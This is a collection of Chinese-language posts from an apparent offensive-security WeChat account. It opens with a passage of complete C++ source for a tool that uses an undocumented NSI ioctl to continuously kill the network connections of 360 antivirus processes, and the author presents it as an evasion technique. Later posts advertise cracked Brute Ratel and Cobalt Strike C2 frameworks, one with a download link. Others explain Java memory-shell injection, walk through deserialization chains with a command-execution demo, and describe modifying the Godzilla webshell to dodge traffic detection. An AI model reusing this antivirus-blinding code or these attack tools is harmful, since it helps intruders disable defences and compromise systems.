  DWORD Param2; // 0x24
  PVOID InputBuffer;   // 0x28
  DWORD InputBufferSize;   // 0x30
  DWORD Unused2;   // 0x34
  PVOID MetricBuffer; // 0x38
  DWORD MetricBufferSize; // 0x40
  DWORD Unused3;   // 0x44
} NSI_SET_PARAMETERS_EX;

bool LoadNtFunctions(){
  HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
  if(!ntdll)returnfalse;

  pNtDeviceIoControlFile =(NtDeviceIoControlFile_t)GetProcAddress(ntdll, "NtDeviceIoControlFile");
  pNtWaitForSingleObject =(NtWaitForSingleObject_t)GetProcAddress(ntdll, "NtWaitForSingleObject");
  pRtlNtStatusToDosError =(RtlNtStatusToDosError_t)GetProcAddress(ntdll, "RtlNtStatusToDosError");

  return pNtDeviceIoControlFile && pNtWaitForSingleObject && pRtlNtStatusToDosError;
}

#define NT_SUCCESS(Status)((NTSTATUS)(Status)>=0)

ULONG NsiIoctl(
  DWORD dwIoControlCode,
  LPVOID lpInBuffer,
  DWORD nInBufferSize,
  LPVOID lpOutBuffer,
  LPDWORD lpBytesReturned,
  LPOVERLAPPED lpOverlapped
){
  static HANDLE hDevice = INVALID_HANDLE_VALUE;
  if(hDevice == INVALID_HANDLE_VALUE){
  HANDLE h = CreateFileW(L"\\\\.\\Nsi", 0, FILE_SHARE_READ | FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, nullptr);
  if(h == INVALID_HANDLE_VALUE)
  return GetLastError();
  if(InterlockedCompareExchangePointer(&hDevice, h, INVALID_HANDLE_VALUE)!= INVALID_HANDLE_VALUE)
  CloseHandle(h);
  }

  if(lpOverlapped){
  if(!DeviceIoControl(hDevice, dwIoControlCode, lpInBuffer, nInBufferSize,
  lpOutBuffer, *lpBytesReturned, lpBytesReturned, lpOverlapped)){
  return GetLastError();
  }
  return0;
  }

  HANDLE hEvent = CreateEvent(nullptr, FALSE, FALSE, nullptr);
  if(!hEvent)return GetLastError();

  IO_STATUS_BLOCK ioStatus ={0};
  NTSTATUS status = pNtDeviceIoControlFile(
  hDevice,
  hEvent,
  nullptr, nullptr,
  &ioStatus,
  dwIoControlCode,
  lpInBuffer,
  nInBufferSize,
  lpOutBuffer,
  *lpBytesReturned
  );

  if(status == STATUS_PENDING){
  status = pNtWaitForSingleObject(hEvent, FALSE, nullptr);
  if(NT_SUCCESS(status))
  status = ioStatus.Status;
  }

  CloseHandle(hEvent);
  if(!NT_SUCCESS(status))
  return pRtlNtStatusToDosError(status);

  *lpBytesReturned =(DWORD)ioStatus.Information;
  return0;
}

ULONG MyNsiSetAllParameters(
  DWORD a1,
  DWORD a2,
  PVOID pModuleId,
  DWORD dwIoCode,
  PVOID pInputBuffer,
  DWORD cbInputBuffer,
  PVOID pMetricBuffer,
  DWORD cbMetricBuffer
){
  NSI_SET_PARAMETERS_EX params ={0};
  DWORD cbReturned =sizeof(params);

  params.ModuleId = pModuleId;
  params.IoCode = dwIoCode;
  params.Param1 = a1;
  params.Param2 = a2;
  params.InputBuffer = pInputBuffer;
  params.InputBufferSize = cbInputBuffer;
  params.MetricBuffer = pMetricBuffer;
  params.MetricBufferSize = cbMetricBuffer;

  return NsiIoctl(
  0x120013, // IOCTL code
  &params,
  sizeof(params),
  &params,
  &cbReturned,
  nullptr
  );
}

// Undocumented TCP module ID for NSI (24 bytes)
BYTE NPI_MS_TCP_MODULEID[]={
  0x18, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x03, 0x4A, 0x00, 0xEB, 0x1A, 0x9B, 0xD4, 0x11,
  0x91, 0x23, 0x00, 0x50, 0x04, 0x77, 0x59, 0xBC
};

// Structure expected by NsiSetAllParameters to represent a TCP socket
struct TcpKillParamsIPv4 {
  WORD  localAddrFamily;
  WORD  localPort;
  DWORD localAddr;
  BYTE  reserved1[20];

  WORD  remoteAddrFamily;
  WORD  remotePort;
  DWORD remoteAddr;
  BYTE  reserved2[20];
};

// Custom replacement for SetTcpEntry using undocumented NSI API
DWORD MySetTcpEntry(MIB_TCPROW_OWNER_PID* pTcpRow){

  // Prepare input data for socket termination
  TcpKillParamsIPv4 params ={0};
  params.localAddrFamily = AF_INET;
  params.localPort =(WORD)pTcpRow->dwLocalPort;
  params.localAddr = pTcpRow->dwLocalAddr;
  params.remoteAddrFamily = AF_INET;
  params.remotePort =(WORD)pTcpRow->dwRemotePort;
  params.remoteAddr = pTcpRow->dwRemoteAddr;

  // Issue command to kill the TCP connection
  DWORD result = MyNsiSetAllParameters(
  1,   // Unknown / static
  2,   // Action code
  (LPVOID)NPI_MS_TCP_MODULEID, // TCP module identifier
  16, // IO code (guessed)
  &params, sizeof(params), // Input buffer
  nullptr, 0 // Output buffer (unused)
  );

  return result;
}

std::vector<DWORD> GetPidsByProcessName(const std::wstring& processName){
  std::vector<DWORD> pids;
  HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  if(snapshot == INVALID_HANDLE_VALUE){
  wprintf(L"[!] CreateToolhelp32Snapshot failed.\n");
  return pids;
  }

  PROCESSENTRY32W pe;
  pe.dwSize =sizeof(pe);
  if(!Process32FirstW(snapshot, &pe)){
  CloseHandle(snapshot);
  wprintf(L"[!] Process32FirstW failed.\n");
  return pids;
  }

  do{
  if(processName == pe.szExeFile){
  pids.push_back(pe.th32ProcessID);
  wprintf(L"[+] Found process: %s (PID: %lu)\n", pe.szExeFile, pe.th32ProcessID);
  }
  }while(Process32NextW(snapshot, &pe));

  CloseHandle(snapshot);
  return pids;
}

void CloseTcpConnectionsByPid(DWORD pid){
  DWORD size =0;
  PMIB_TCPTABLE2 tcpTable =nullptr;

  if(GetTcpTable2(nullptr, &size, TRUE)!= ERROR_INSUFFICIENT_BUFFER){
  wprintf(L"[!] Failed to query TCP table size.\n");
  return;
  }

  tcpTable =(PMIB_TCPTABLE2)malloc(size);
  if(!tcpTable){
  wprintf(L"[!] Memory allocation failed.\n");
  return;
  }

  if(GetTcpTable2(tcpTable, &size, TRUE)!= NO_ERROR){
  free(tcpTable);
  wprintf(L"[!] Failed to get TCP table.\n");
  return;
  }

  int closedCount =0;
  for(DWORD i =0; i < tcpTable->dwNumEntries;++i){
  MIB_TCPROW2& row = tcpTable->table[i];
  if(row.dwOwningPid == pid && row.dwState == MIB_TCP_STATE_ESTAB){
  MIB_TCPROW2 rowToSet = row;
  rowToSet.dwState = MIB_TCP_STATE_DELETE_TCB;

  DWORD result = MySetTcpEntry((MIB_TCPROW_OWNER_PID*)&row);
  if(result == NO_ERROR){
  closedCount++;
  IN_ADDR localAddr ={ row.dwLocalAddr };
  IN_ADDR remoteAddr ={ row.dwRemoteAddr };
  wprintf(L"   [-] Closed TCP connection: %S:%d -> %S:%d\n",
  inet_ntoa(localAddr), ntohs((u_short)row.dwLocalPort),
  inet_ntoa(remoteAddr), ntohs((u_short)row.dwRemotePort));
  }
  else{
  wprintf(L"   [!] Failed to close connection. Error code: %lu\n", result);
  }
  }
  }

  if(closedCount >0){
  wprintf(L"[=] Closed %d connections for PID %lu\n", closedCount, pid);
  }

  free(tcpTable);
}

int wmain(int argc, wchar_t* argv[]){

  LoadNtFunctions();

  std::vector<std::wstring> targetProcs ={L"360Tray.exe", L"360Safe.exe", L"LiveUpdate360.exe", L"safesvr.exe", L"360leakfixer.exe"};

  wprintf(L"[*] Starting connection monitor...\n");

  while(true){
  for(constauto& procName : targetProcs){
  std::vector<DWORD> pids = GetPidsByProcessName(procName);
  for(DWORD pid : pids){
  CloseTcpConnectionsByPid(pid);
  }
  }
  }

  return0;
}

现在运行一会儿观察一下

很好一切正常

现在我们就拥有了一个最底层的 SetTcpEntry ，规避的能力也大大的提升。其实根据这些东西都可以得出一个结论，但是我不说，其实还有更底层更巧妙地办法，答案在计算机网络中。自行学习思考。

至于更多的武器化我已经无心去看，睡觉！

本文来自可以遐想的碎碎念（公开内容）

阅读原文

跳转微信打开

41大事件！BRC4破解版/41内部edr&xdr靶场对外开放

Fri, 28 Jun 2024 00:34:00 +0800

原创 41group 2024-06-28 00:34 安徽

各位安全圈同僚，还在用着被标记到烂的cs吗？还在捧着个破cs当宝贝吗？抬头看看天吧。

BRC4官方最新版虽然已经更新到了2.0，但是历史上仅泄露过1.2.2版本

虽然1.4.5版本已经时隔了一年多，但是规避能力依旧很感人。

1.2到1.4版本更新了一些很重要的核心功能

1、内存加载PE文件

2、支持UDP的socks5

3、Sleep的规避能力加强

4、反向端口转发

5、更可控的配置

本次为BRC4 1.4.5版本泄露，已经经过我家大宝贝破解实现使用自由~

上线KES测试:

内存扫描

Hash获取

截图：

上线CrowdStrike测试：

工具珍贵，拒绝白嫖。

为提高全民网络安全技术水平，团队决定在星球内部提供中高级EDR/XDR测试环境，拒绝白嫖，不花钱？您还是玩数字吧。

Falcon最新版

SentinelOne最新版

Elastic最新版

Kaspersky Endpoint 最新版

为了防止白嫖行为，星球设置了七天可见，通过后可以加入交流群平日交流学习

阅读原文

跳转微信打开

java内存马详解

Mon, 25 Mar 2024 15:37:00 +0800

原创 41group 2024-03-25 15:37 安徽

在讲过反序列化之后，在实战中可以发现很多场景都是通过反序列化植入内存马这种操作。

那么内存马的好处肯定不用多说了，但是内存马具体是怎么植入的呢，老规矩本人java也是自学，尽可能用人话给各位简单讲一下。

filter

在讲内存马之前，需要先知道下在java中存在一种叫filter的东西。

就是这个东西的存在实现了比如登录，鉴权等等骚操作。那么filter是啥？

通俗来讲，filter就是一个过滤器，在java中你访问的每个请求都会先通过判断是否存在于filter中再决定是否要进行放行。

在代码中的体现具体为。

在web.xml中注册了所有当前的filter

filter-name:表示当前filter的名称

filter-class：表示filter详细代码的类

url-pattern：表示要拦截的路径

再看filter的处理部分代码

ok配置好后大致的filter功能有简单的理解了。那我们实际看一下filter是如何处理的。

下断点我们进入到了这里

可以看到调用了filterChain的doFilter方法。查看下可以发现filterChain中存放的就是从web.xml中读取到的配置的filter

既然filterChain已经存在了web.xml中的配置，我们就找下filterChain是怎么被创建的。

通过代码我们发现filterChain的创建使用到了createFilterChain方法，看一下这个方法具体实现

跟进之后我们发现他在其中使用了findFilterMaps来查找你web.xml中所有的配置，并保存在filtermap中。

然后根据你请求的url在这个filtermap中依次对比，如果匹配到了就添加进入filterChain。

所以说，注册内存马其实就是注册一个我们自己的filter就可以了。

根据代码可知，注册我们的内存马，需要filterConfig这个东西。而filterConfig需要使用到context中的findFilterConfig进行创建。再看下刚刚的findFilterMaps。

可以看到一切的起源都和context有关系。

那我们就看一下context中具体的实现了什么。

直接看关键点，在context中存在直接添加进filtermap的方法，我们只需要直接调用，即可注册自己的filter

在context中，和filter有关的我们需要注册这三个参数。

那么实际操作下看下怎么添加。

还记得开头讲的web.xml中的每个字段代表的含义吗。

和这里的字段就可以对应上了

在filtermap中只需要对应上我们的name和url就可以了。

再看下def中需要对应哪些

根据结果构造代码

最后只需要把我们构造的def和map注入进去就可以了。

这样我们就成功获得了一个我们自己可控的filter

阅读原文

跳转微信打开

反序列化详解

Fri, 08 Mar 2024 16:39:00 +0800

原创 41group 2024-03-08 16:39 安徽

反序列化作为新生代比较亮点的漏洞，利用难度和理解难度相对来说在sql注入，越权这种常见漏洞相比还是比较困难的。

反序列化作为新生代比较亮点的漏洞，利用难度和理解难度相对来说在sql注入，越权这种常见漏洞相比还是比较困难的。网上文章呢对小白可能不是很好理解，今天这篇文章本人就尽量使用浅显易懂的方式给大家讲解一下。

首先反序列化是什么？

java反序列化是将序列化的对象转换回原始对象的一个过程。在Java中，序列化是指将对象转换为字节序列以便在网络上传输或保存到文件中。

反序列化则是将字节序列转换回对象的过程。通过反序列化，可以将之前序列化的对象重新恢复成原始的对象，实现对象的持久化和传输。

注意序列化后的对象时可以被用户随意处理的，包括网络传输或保存为文件，这也就奠定了反序列化漏洞的利用条件宽泛与否。

那知道了序列化与反序列化的定义我们来看反序列化漏洞的前提是什么？

反序列化漏洞的产生一定要对方项目存在有高危风险的类库。（比如常见的cc库）

并且在代码中一定是调用了readObject方法尝试还原对象。

如果不存在这两点，基本就不会存在反序列化漏洞。

URLDNS

从urldns开始讲起，在反序列化中urldns是一条完美的适合用于快速检测的链，虽然他只能出发dns请求，但是其不需要依赖第三方类库的特性使其有超高的遍布性。

我们直接看yso中urldns的payload

反序列化漏洞中大家只需要记得最后return的是什么，入口点就是什么。所以在这段payload中入口点就是ht。

那么看ht他new了一个hashmap，这就说明他的入口和hashmap有很大的关联，所以我们直接跟进到hashmap中

进到hashmap还记得上面我说的吗，反序列化漏洞的存在必须其调用过readObject还原对象。所以我们通篇查询是否存在readObject。

果然是存在的，那么这时候我们随便下个断点把，看看他具体在readObject都干了什么。

通过跟进代码我们发现他获取了两个参数key和value，并且在最后一行putval中，使用hash计算了key的哈希值。

直接跟进hashmap的hash进行查看。

可以发现其传入了一个object类型参数key，在key为空时返回0，不为空时调用key下的hashcode进行处理。

我们有key参数，所以继续跟进

这时我们跟进到key的hashcode方法中，他存在判断，当hashcode不等于-1时直接返回hashcode，等于-1时调用handler的hashcode进行处理。所以我们还需要跟进。

跟到这一步，为何会触发dnslog就已经清晰了，在最终handler的hashcode中执行了gethostaddress操作，仔细看他直接收一个参数u。

ok那到这里暂时逻辑清楚了，我们需要制作一个payload满足key不为空，并且hashcode必须是-1，这样就能最终进入到handler的hashcode中执行了gethostaddress。那回过头来看yso的payload

逐行解释

URLStreamHandler handler = new SilentURLStreamHandler();用于处理url的打开，链接，读取等行为

HashMap ht = new HashMap();
URL u = new URL((URL)null, url, handler);
创建一个url对象u，并传入string类型的url作为我们的dnslog地址

ht.put(u, url);发送请求

Reflections.setFieldValue(u, "hashCode", -1);
精髓就在这一句，通过反射修改u对象的hashcode参数为-1

整理下思路入口点hashmap的readobject，其中在putval时调用hash方法处理了key。在hash方法中key不为空情况下调用了key的hashcode，key的hashcode要求必须为-1才可进行到执行dnslog的逻辑。

所以看ht.put(u, url);这一句，其中u就是key相当于我们传入的dnslog地址，url就是value。url这个可以随意更改，在逻辑中我们也看到了这条链触发和value没有任何关系。

在获得key之后我们达成了key不为空条件，此时通过反射调用hashcode方法，并且修改为-1达成必须为-1的条件，这样完美触发dnslog请求。

cc5

cc链作为经典之一必需拿出来溜溜，再说cc之前需要先知道一些基础知识。

cc中的存在了一个叫TransformMap的类，这个类实现了一系列的转化，在转化过程中值我们可以自行操作，所以为反序列化漏洞提供了无限的可能。

那么知道了基础知识后，我们来看下cc5的payload

以命令执行为例子，反序列化漏洞需要我们生成一个可以命令执行的payload，那么在java中我们知道最常见的命令执行代码就是runtime.exec了。那么就来看一眼yso的payload是怎么构造出命令执行的呢？

Transformer[] transformers = new Transformer[]{new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}), new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}), new InvokerTransformer("exec", new Class[]{String.class}, execArgs), new ConstantTransformer(1)};

这一行是yso的构造出的命令执行，看不懂没关系，我们拆开一点点看。

new Transformer[]{new ConstantTransformer(Runtime.class)

这一句作用是把对象转换为一个恒定的值，在这里的作用就是无论原始映射中的值是什么，TransformMa 都会将其转换为 Runtime.class。这么做的好处就是增加了容错率和反序列化的成功率。

new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]})

创建一个InvokerTransformer，它将调用Java运行时类的getMethod方法，参数值是getRuntime，表示要调用getMethod的名称

 new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),

继续使用InvokerTransformer这次调用的是invoke，使用invoke把刚刚反射获取的getMethod实例化出来。

new InvokerTransformer("exec", new Class[]{String.class}, execArgs)

在invoke完成的基础上调用exec方法。

此时回想一下刚刚一系列的操作。先是设置恒定值Runtime.class。然后使用getMethod获取到他的getRuntime，使用invoke实例出来，最后调用实例化后的exec方法，所以这行代码最终结果就是

Runtime.getRuntime().exec

做个实验

看这段简易的代码，和yso的payload很类似。

Runtime test = Runtime.getRuntime();
InvokerTransformer invokerTransformer = new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"});
invokerTransformer.transform(test);

功能很简单，test赋值Runtime.getRuntime()方便下面的操作成功获取。

使用InvokerTransformer传递了exec这个方法，并且它可以接受两个参数，把calc作为参数传递进去。

最后调用InvokerTransformer的transform方法，将先前创建的Runtime对象作为第一个参数传递。

执行结果就是成功弹出计算器。

总结一下其实InvokerTransformer其实就是把上一个处理的结果作为输入，并且用户可以对其进行自定义的操作，在我们的操作里就使用了反射获取了一个可被我们操控的命令执行语句。

那么现在payload有了我们继续看cc5的链子。

Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

进入LazyMap

发现其继承自Serializable可被序列化。并且存在了一个高危险的操作transform。去找谁调用了get方法。

根据链可知TiedMapEntry中调用了get这个方法。

那么现在逐渐清晰了，我们通过调用getval相当于间接调用了get这个方法，所以现在就是找哪里调用过getval

搜索可知equals，hashcode，toString都利用了getval方法。

那么还记得反序列化的必要条件吗，必须是有readobject，所以我们现在就来找哪里的readobject使用了这三个方法。

根据链子我们找到了BadAttributeValueExpException，发现其使用了readobject，并且使用了tostring方法。至此cc5的链就完美的形成了。

总结一下，BadAttributeValueExpException.readObject调用了tostring方法，相当于简介调用了TiedMapEntry.getValue，然而TiedMapEntry.getValue中调用了LazyMap.get方法。这个方法中存在了transform这个高危方法可使我们通过反射的方式构造一条命令执行语句出来。

在调试中可以发现TiedMapEntry中并非只有tostring调用了getval

所以其实这三个位置都有可发展空间，比如hashcode，是不是很眼熟？？？就留给大家自己发散思维吧。

阅读原文

跳转微信打开

手把手带二开哥斯拉（1）

Wed, 28 Feb 2024 15:50:00 +0800

原创 41group 2024-02-28 15:50 安徽

由于哥斯拉流传过于广泛，以至于实际业务中很多设备会对其进行查杀，主要手段一是查杀webshell，二是针对流量

由于哥斯拉流传过于广泛，以至于实际业务中很多设备会对其进行查杀，主要手段一是查杀webshell，二是针对流量特征进行分析。

这篇先大致讲下如何对自己shell的流量进行保护。

先看下原版哥斯拉的流量特征有什么

大致了解下过程，在点击链接时候会发送三个包，第一个强特征发送自定义的函数列表给服务端（后期内部命令执行，文件查看等功能都是在此时把接口传入服务端的），返回值获得session

第二个验活。没什么特殊

第三个返回对方服务器的配置等信息，就是每次连接时的基础信息那部分

上面数据包包括返回结果，从算法与长度上都非常容易被检测，稍加探测即可发现是恶意攻击流量。

为了规避这些检查，需要对请求与返回包进行自定义，对webshell动态加载。

自定义profile

增加profile管理功能，最基础的增删改查。

具体如何实现ui可通过swing进行编写，就不过多阐述

shellsetting

在添加完ui后需进入shellsetting添加Profile下拉框等组件，方便使用


private JComboBox<String> c2ProfileComboBox;

绑定布局

GBC gbcLC2Profile = (new GBC(0, 13)).setInsets(5, -40, 0, 0);GBC gbcC2Profile = (new GBC(1, 13, 3, 1)).setInsets(5, 20, 0, 0);

添加控件

this.basicsPanel.add(this.c2ProfileLabel, gbcLC2Profile);this.basicsPanel.add(this.c2ProfileComboBox, gbcC2Profile);

添加事件

这些做完之后就能收获一个完整的profile功能

但是仅仅这样是不够的，现在我们只能创建profile，怎么把他应用到数据包中呢？

shellentity

为了使我们创建的profile能应用进数据包中，我们需要修改哥斯拉存储shell实体的部分代码

添加新字段并编写对应代码以存储profile信息

信息存储了还远远不够需要有地方能够处理。

c2channel

c2channel算是哥斯拉中的核心，负责处理载荷与发送c2请求，所以最核心的地方我们需要在发送数据包前处理有关profile的代码

在c2channel中我们需要处理好从shellentity获取到的profile值，初始化好模板后，匹配profile规则对数据包进行梳理重构。在一切进行完成后就可通过sendRequest发送请求。

在完成到这一步时基本你已经学会了怎么控制哥斯拉发送的数据包格式等操作，具体实现代码就自己想把，抄作业没啥意思。

在修改完profile后还可以顺手实现全随机化生成数据包功能，只需要在处理数据包前添加链表通过随机值拼接完整数据包即可。玩法很多还需深入挖掘。

sendRequest大致代码：

阅读原文

跳转微信打开

探究Wallet Drainers使用Create2 Bypass钱包安全告警

Mon, 01 Jan 2024 12:34:00 +0800

S7iter 2024-01-01 12:34 江苏

最近链上的TVL很高，Wallet Drainers也越来越活跃了。

自己简单看了下,感觉蛮有趣的，因为最近手中的事情太多了，就简单记录下。

1前言

最近链上的TVL很高，Wallet Drainers也越来越活跃了。

自己简单看了下,感觉蛮有趣的，因为最近手中的事情太多了，就简单记录下。

2Create和Create2

在了解如何bypass钱包的安全告警之前，首先需要了解这一行为的实现，基于Create2

Create

EOA可以创建智能合约，智能合约同样也是可以创建智能合约的

create通常与address结合使用，用于在智能合约中创建新的合约实例。通过使用create，合约可以在其执行期间动态地生成新的合约。

这边我写一个简单的示例：

contract Factory {
    event NewContract(address indexed createdContract);
    function createNewContract() external {
        // 使用 create 创建新的合约
        address newContract = address(new MyContract());
        emit NewContract(newContract);
    }
}
contract MyContract {
    // 合约的逻辑和状态变量
    address public owner;
    constructor() {
        owner = msg.sender;
    }
    function isOwner() external view returns (bool) {
        return msg.sender == owner;
    }
}

首先部署Factory合约合约地址为0xa131AD247055FD2e2aA8b156A11bdEc81b9eAD95

然后创建新的合约createNewContract，可以看到日志中：

[
	{
		"from": "0xa131AD247055FD2e2aA8b156A11bdEc81b9eAD95",
		"topic": "0x387ea218537e939551af33bbc2dd6c53b1fee55d377a0dce288258f972cb3a9c",
		"event": "NewContract",
		"args": {
			"0": "0xc176E14869501dd2B8DCFaAe60Bd022717b6350a",
			"createdContract": "0xc176E14869501dd2B8DCFaAe60Bd022717b6350a"
		}soli
	}
]

可以看到创建了合约0xc176E14869501dd2B8DCFaAe60Bd022717b6350a

我们再去部署MyContract 可以发现合约地址为0xc176E14869501dd2B8DCFaAe60Bd022717b6350a

点击owner为

"0": "address: 0xa131AD247055FD2e2aA8b156A11bdEc81b9eAD95"

owner为创建的合约地址，那么就实现了在合约中创建合约的目的。

Create2

create2 允许合约在指定的地址上创建新的合约实例

那么就可以达到“预测”合约地址的方法

因为在地址的计算机制中，通常使用keccak256 哈希函数计算合约地址

create2为我们提供了一个计算地址的salt值，这样我们就可以更加灵活地控制合约地址

比如我们使用create2，我们可以在创建合约之前预测新创建的合约地址，如果我们在该地址上预先提供好需要部署的合约，那么就可以达到很多目的，比如：可以进行代币转移，合约升级，恶意合约的部署等等。

写一个简单的示例：

contract PredictableContract {
    address public owner;
    
    event ContractCreated(address indexed newContract, address indexed owner);
    
    constructor(address _owner) payable {
        owner = _owner;
    }
    function getOwner() public view returns (address) {
        return owner;
    }
}
contract Factory {
    function deploy(uint _salt) public payable returns (address) {
        bytes32 hash = keccak256(
            abi.encodePacked(
                bytes1(0xff),          
                address(this),         
                _salt,                 
                type(PredictableContract).creationCode 
            )
        );
        address newContract = address(uint160(uint256(hash)));
        return address(new PredictableContract{salt: bytes32(_salt)}(msg.sender));
    }
}

给salt为66在部署的合约(合约地址0x3596A5B0cb68D61C071d5A535A3B676fB2b7D678)

中deploy一个合约

可以看到

解码输入	{ "uint256 _salt": "66" }
解码输出	{ "0": "address: 0xa852De88789ced6c8aF04738Cfb0E444cbb83102" }

得到预测的合约0xa852De88789ced6c8aF04738Cfb0E444cbb83102

我们部署到owner合约地址可以看到owner为

0xa852De88789ced6c8aF04738Cfb0E444cbb83102

也可以看下这位师傅写的solidity使用create2预测合约地址｜create2用法｜

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract ContractDemo {
    address public owner;
    // Only owners can call transactions marked with this modifier
    modifier onlyOwner() {
        require(owner == msg.sender, "Caller is not the owner");
        _;
    }
    constructor(address _owner) payable {
        owner = _owner;
    }
    function getOwner() public view returns (address) {
        return owner;
    }
    
}
contract Factory {
    // Returns the address of the newly deployed contract
    function deploy(
        uint _salt
    ) public payable returns (address) {
        return address(new ContractDemo{salt: bytes32(_salt)}(msg.sender));
    }
    //  获取待部署合约字节码
    function getBytecode()
        public
        view
        returns (bytes memory)
    {
        bytes memory bytecode = type(ContractDemo).creationCode;
        return abi.encodePacked(bytecode, abi.encode(msg.sender));
    }
    /** 获取待部署合约地址
        params:
            _salt: 随机整数，用于预计算地址
    */ 
    function getAddress(uint256 _salt)
        public
        view
        returns (address)
    {
        // Get a hash concatenating args passed to encodePacked
        bytes32 hash = keccak256(
            abi.encodePacked(
                bytes1(0xff), // 0
                address(this), // address of factory contract
                _salt, // a random salt
                keccak256(getBytecode()) // the wallet contract bytecode
            )
        );
        // Cast last 20 bytes of hash to address
        return address(uint160(uint256(hash)));
    }
}

更多详情:Create2 & Precompute Contract Address with Create2 | Solidity by Example

3Bypass Wallet Warning

bypass流程

用ScamSniffer的图示很清晰了，后续我再次捕捉这种基于create2的钓鱼或者攻击手段会更新再这篇

参考

Wallet Drainers Starts Using Create2 Bypass Wallet Security Alert - Scam Sniffer
Create2 | WTF Academy

4关于圈子

漏洞报告集锦 - 包括不限于 0day / 1day / Nday 等漏洞报告及分析
影响力分析与合约建议 - 针对大型事件的专业分析，提供行业领先的市场影响洞见和建议。
实战攻防演练 - 攻防演练和渗透测试脱敏报告，经验快速学习。
Web3安全新视角 - 深入Web3的世界，掌握最新的web3安全趋势和漏洞分析。
源代码探索 - 探究各类系统产品的源代码，硬核提高审计能力！

阅读原文

跳转微信打开

F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747)（EXP效果）

Mon, 30 Oct 2023 11:37:00 +0800

41group 2023-10-30 11:37 安徽

看各大寻血猎犬已经知道这个洞了，那就发出来给大家看看这个洞真正exp是啥效果，防止被花花互联网欺骗防杠精自己

看各大寻血猎犬已经知道这个洞了，那就发出来给大家看看这个洞真正exp是啥效果，防止被花花互联网欺骗

防杠精自己看前后ip

进群交流翻前面文章找wx号

阅读原文

跳转微信打开

cs4.9最新版已破解自领

Mon, 09 Oct 2023 14:39:00 +0800

41group 2023-10-09 14:39 安徽

cs4.9最新版已破解完毕，各位红队兄弟们请自取 https://www.123pan.com/s/wJAk

cs4.9最新版已破解完毕，各位红队兄弟们请自取

https://www.123pan.com/s/wJAkjv-cQ0E3.html

欢迎加群领码！！！！！！！！！

阅读原文

跳转微信打开

重磅消息Cobalt Strike 4.9官方最新版

Sun, 08 Oct 2023 21:17:00 +0800

41group 2023-10-08 21:17 安徽

十一结束了41也来甩重磅了！！！！！Cobalt Strike大家应该用的很多。那你的是什么版本呢？4.3？

十一结束了41也来甩重磅了！！！！！

Cobalt Strike大家应该用的很多。那你的是什么版本呢？4.3？4.5？

官方总算是更新到4.9。41也是不知道从哪个角落里就拿到了第一手才有了国庆后的小高潮！

直接展示：

官方4.9

熟悉的结构

敬请期待破解！！！！！加w入群！wx：Mathearsion

阅读原文

跳转微信打开

SnakeYaml反序列化漏洞

Wed, 06 Sep 2023 02:19:00 +0800

原创 L0ne1y 2023-09-06 02:19 四川

YAML 基本语法YAML，YAML 是"YAML Ain’t a Markup Language"(YAM

YAML 基本语法

YAML，YAML 是"YAML Ain’t a Markup Language"(YAML不是一种标记语言)的递归缩写, 是一个可读性高、用来表达数据序列化的格式，类似于XML但比XML更简洁。

YAML的语法和其他高级语言类似, 并且可以简单表达清单、散列表，标量等资料形态。它使用空白符号缩进和大量依赖外观的特色, 特别适合用来表达或编辑数据结构、各种配置文件、倾印调试内容、文件大纲(例如: 许多电子邮件标题格式和YAML非常接近).

格式

YAML 具体使用，首先YAML中允许表示三种格式，分别是：常量值、对象和数组。例如:

# 即表示url属性值；url: http://www.yiibai.com
# 即表示server.host属性的值；server:    host: http://www.yiibai.com
# 数组,即表示server为[a,b,c]server:    - 120.168.0.21    - 120.168.0.22    - 120.168.0.23
# 常量pi: 3.14   # 定义一个数值3.14hasChild: true  # 定义一个boolean值name: '你好YAML'   # 定义一个字符串

注释

和properties文件格式相同，YAML使用#作为注释开始且只有行注释.

YAML基本格式要求:

大小敏感.
利用缩进来表示层级关系.
缩进不能使用 TAB ，只能使用空格且对空格个数没有要求, 只需要相同层级左对齐即可(一般2个或4个空格).

对象

对象使用冒号代表, 格式为 key: value ，需要注意在冒号后加上一个空格.
可以使用缩进来表示层级关系.

key:    demo1: val1    demo2: val2

较为复杂的对象格式, 可以使用问号加一个空格代表一个复杂的 key ，配合一个冒号加一个空格代表一个值value.

数组

使用一个短横线加一个空格代表一个数组项.

demo:    - val1    - val2
或者
-       - val1    - val2 # [[val1, val2]]

相对复杂的写法, 表示是 companies 属性是一个数组, 每一个数组元素又是由id, name, price三个属性构成; 数组也可以使用流式(flow)的方式表示.

companies:    -        id: 1        name: company1        price: 200W    -        id: 2        name: company2        price: 500W

常量

YAML 中提供了多种常量结构, 包括: 整数, 浮点数, 字符串, NULL, 日期, 布尔, 时间.

boolean:     - TRUE  #true,True都可以    - FALSE  #false，False都可以
float:    - 3.14    - 6.8523015e+5  #可以使用科学计数法
int:    - 123    - 0b1010_0111_0100_1010_1110    #二进制表示
null:    nodeName: 'node'    parent: ~  #使用~表示null
string:    - 哈哈    - 'Hello world'  #可以使用双引号或者单引号包裹特殊字符    - newline      newline2    #字符串可以拆成多行，每一行会被转化成一个空格
date:    - 2018-07-17    #日期必须使用ISO 8601格式，即yyyy-MM-dd
datetime:     -  2018-07-17T19:02:31+08:00    #时间使用ISO 8601格式，时间和日期之间使用T连接，最后使用+代表时区

SnakeYaml 简介

Snakeyaml 包主要用来解析 yaml 格式的内容， yaml 语言比普通的 xml 与 properties 等配置文件的可读性更高，像是 Spring 系列就支持 yaml 的配置文件，而SnakeYaml是一个完整的YAML1.1规范Processor，支持UTF-8/UTF-16，支持Java对象的序列化/反序列化，支持所有YAML定义的类型。

Yaml语法参考：https://www.yiibai.com/yaml

Spring配置文件经常遇到。

